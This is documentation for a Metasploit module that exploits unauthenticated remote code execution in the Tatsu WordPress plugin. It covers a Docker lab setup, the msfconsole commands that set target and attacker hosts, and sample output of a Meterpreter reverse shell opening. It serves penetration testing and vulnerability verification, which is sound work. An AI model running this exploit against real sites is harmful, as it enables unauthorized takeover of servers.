Wp Tatsu Rce - Metasploit Framework

Vulnerable Application

This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11. The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory. Then module will trigger the payload by sending request with payload directory as URI. The vulnerable plugin is available here

Verification Steps

Install the application 1.1 Create docker-compose.yml

yaml

services:

  wordpress:
    image: wordpress:6.3.2
    restart: always
    ports:
      - 5555:80
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: ms
      WORDPRESS_DB_PASSWORD: supersecret
      WORDPRESS_DB_NAME: proof_of_concept
    volumes:
      - wordpress:/var/www/html
      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini

  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_DATABASE: proof_of_concept
      MYSQL_USER: ms
      MYSQL_PASSWORD: supersecret
      MYSQL_ROOT_PASSWORD: supersecret
    volumes:
      - db:/var/lib/mysql

volumes:
  wordpress:
  db:

1.2 Download plugin 1.3 Install the plugin in Wordpress admin portal

msfconsole
use multi/http/wp_tatsu_rce
set RHOST [target IP]
set RPORT [target PORT]
set LHOST [attacker's IP]
set LPORT [attacker's port]

Options

Scenarios

Vulnerable version is <= 3.3.11.

`msf exploit(multi/http/wp_tatsu_rce) > run
[*] Started reverse TCP handler on 192.168.168.128:4444 
[*] Sending stage (40004 bytes) to 172.18.0.2
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 172.18.0.2:37718) at 2025-06-11 18:59:35 +0200
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer    : ff0d55ec29bf
OS          : Linux ff0d55ec29bf 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
Meterpreter : php/linux
meterpreter >